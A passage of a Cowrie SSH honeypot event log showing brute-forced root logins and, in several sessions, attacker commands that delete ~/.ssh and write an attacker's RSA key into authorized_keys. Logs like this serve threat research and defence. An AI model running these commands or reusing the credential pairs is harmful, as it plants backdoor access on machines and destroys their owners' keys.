.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T02:46:14.502929Z","src_ip":"212.227.235.229","session":"95610c3be02c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:46:14.916052Z","src_ip":"212.227.235.229","session":"95610c3be02c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T02:46:15.054564Z","session":"95610c3be02c"}
{"eventid":"cowrie.session.closed","duration":12.924612998962402,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:21.643045Z","src_ip":"212.227.125.160","session":"1d78f9f74f63"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53926,"dst_ip":"1.2.3.4","dst_port":22,"session":"77f28f2d5f0d","protocol":"ssh","message":"New connection: 217.72.205.35:53926 (1.2.3.4:22) [session: 77f28f2d5f0d]","sensor":"my-vps","timestamp":"2025-09-09T02:46:26.599851Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:26.601124Z","src_ip":"217.72.205.35","session":"77f28f2d5f0d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:28.293491Z","src_ip":"212.227.235.229","session":"3a479aabb320"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58286,"dst_ip":"1.2.3.4","dst_port":22,"session":"e850299c6c9d","protocol":"ssh","message":"New connection: 212.227.235.229:58286 (1.2.3.4:22) [session: e850299c6c9d]","sensor":"my-vps","timestamp":"2025-09-09T02:47:10.728897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:47:10.734228Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:47:11.113128Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.login.success","username":"root","password":"Ww@123456","message":"login attempt [root/Ww@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:47:12.652805Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:47:13.480951Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:47:13.481672Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:47:13.482600Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:13.869458Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:47:14.647114Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:47:14.647802Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:47:15.036647Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:15.037541Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60270,"dst_ip":"1.2.3.4","dst_port":22,"session":"01d8f4b9111c","protocol":"ssh","message":"New connection: 212.227.235.229:60270 (1.2.3.4:22) [session: 01d8f4b9111c]","sensor":"my-vps","timestamp":"2025-09-09T02:47:15.415567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:47:15.422876Z","src_ip":"212.227.235.229","session":"01d8f4b9111c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:47:15.800952Z","src_ip":"212.227.235.229","session":"01d8f4b9111c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:47:17.328018Z","src_ip":"212.227.235.229","session":"01d8f4b9111c"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:18.716575Z","src_ip":"212.227.235.229","session":"01d8f4b9111c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33500,"dst_ip":"1.2.3.4","dst_port":22,"session":"a514069d86cd","protocol":"ssh","message":"New connection: 212.227.235.229:33500 (1.2.3.4:22) [session: a514069d86cd]","sensor":"my-vps","timestamp":"2025-09-09T02:47:19.088184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:47:19.092727Z","src_ip":"212.227.235.229","session":"a514069d86cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:47:19.468015Z","src_ip":"212.227.235.229","session":"a514069d86cd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:47:20.977415Z","src_ip":"212.227.235.229","session":"a514069d86cd"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:21.357212Z","src_ip":"212.227.235.229","session":"e850299c6c9d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:21.358085Z","src_ip":"212.227.235.229","session":"a514069d86cd"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11810,"dst_ip":"1.2.3.4","dst_port":22,"session":"89a9e7cf4253","protocol":"ssh","message":"New connection: 185.152.45.241:11810 (1.2.3.4:22) [session: 89a9e7cf4253]","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.212532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.213800Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.273327Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.login.success","username":"root","password":"zxasqw","message":"login attempt [root/zxasqw] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.493977Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:47:22.636825Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.637540Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.638744Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.688691Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:47:22.842309Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.843168Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.904248Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.905120Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11811,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f23f8a777e","protocol":"ssh","message":"New connection: 185.152.45.241:11811 (1.2.3.4:22) [session: 36f23f8a777e]","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.945472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:47:22.946143Z","src_ip":"185.152.45.241","session":"36f23f8a777e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:47:23.004738Z","src_ip":"185.152.45.241","session":"36f23f8a777e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:47:23.229000Z","src_ip":"185.152.45.241","session":"36f23f8a777e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:24.279346Z","src_ip":"185.152.45.241","session":"36f23f8a777e"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11799,"dst_ip":"1.2.3.4","dst_port":22,"session":"28a141c9677e","protocol":"ssh","message":"New connection: 185.152.45.241:11799 (1.2.3.4:22) [session: 28a141c9677e]","sensor":"my-vps","timestamp":"2025-09-09T02:47:24.323562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:47:24.324292Z","src_ip":"185.152.45.241","session":"28a141c9677e"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:24.364990Z","src_ip":"212.227.235.229","session":"95610c3be02c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:47:24.368612Z","src_ip":"185.152.45.241","session":"28a141c9677e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:47:24.608999Z","src_ip":"185.152.45.241","session":"28a141c9677e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:24.653758Z","src_ip":"185.152.45.241","session":"89a9e7cf4253"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:47:24.658555Z","src_ip":"185.152.45.241","session":"28a141c9677e"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11813,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dfaca907ecd","protocol":"ssh","message":"New connection: 185.152.45.241:11813 (1.2.3.4:22) [session: 3dfaca907ecd]","sensor":"my-vps","timestamp":"2025-09-09T02:48:40.006552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:48:40.008324Z","src_ip":"185.152.45.241","session":"3dfaca907ecd"}
